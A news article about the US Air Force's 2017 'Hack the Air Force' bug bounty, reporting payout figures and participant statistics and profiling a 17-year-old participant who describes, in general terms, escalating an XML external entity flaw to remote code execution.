Look Ma, I Got a Job for Life: Teenager Hacks US Air Force in “Bug Bounty”
In April 2017, the US Department of Defense announced its “Hack the Air Force” bug bounty program, in which some 600 hackers and security researchers from around the world would be invited to hack USAF cyber programs and determine security vulnerabilities. The “bug bounty” ran from May 30-June 23.
Marten Mickos, chief executive of HackerOne, a contractor that runs hacker programs like “Hack the Pentagon” and “Hack the Army,” asserted that “It was the most successful [DoD] bug bounty so far,” according to The Hill.
Statistics released by the USAF and HackerOne reveal that the Air Force bug bounty program was more successful than a similar Pentagon program, which found 70 fewer vulnerabilities, or an Army cyber defense bounty program, which missed some 90 vulnerabilities.
Not all security vulnerabilities are created equal, however, and some are more serious than others. The “Hack the Air Force” program awarded $130,000 to hackers — $30,000 more than what was awarded in the Army’s bounty program, indicating that the Air Force hackers uncovered some severe security issues.
This is the first time that the field of hackers included participants from overseas, and the improvement was noted as foreign-born hackers were responsible for uncovering some 25 percent of vulnerabilities.
The largest award, however, went to 17-year-old Jack Cable, a high school student who won a significant cash prize after identifying 30 major vulnerabilities in the USAF cyber security infrastructure.
Jack took home loads of bug bounty money; The Pentagon paid $130,000 in prizes, as well as $1,000 and $5,000 for each security flaw.
“Two participants in the program were active duty military personnel and 33 participants came from outside the US. Top participating hackers were under 20 years old, including a 17-year-old who submitted 30 valid reports and earned the largest bounty sum during the challenge window,” the Air Force said in a statement.
In an interview with Marketplace, Cable said that he discovered an XML external entities flaw.
“I found that I could give it a URL and the application would make a request to that website. And I was able to escalate that after working on it for a few hours into a remote code execution. So that would allow me to basically do whatever I wanted. So I could access all the user data that was on the website and I could change anything that I wanted to,” the teen stated.
When asked why he decided to be one of the “good hackers,” Cable said, “I try to be because it’s really risky if you try to exploit vulnerabilities that you find. You could wind up in jail or be sued by different companies. The advantages of these bug counting programs are great because you get recognition from the companies, they pay you and you get to say you found a vulnerability rather than just having to hide it.”
Bug bounty programs have become increasingly popular among government entities and big companies including Facebook, Google and Uber looking to patch up their cyber security holes.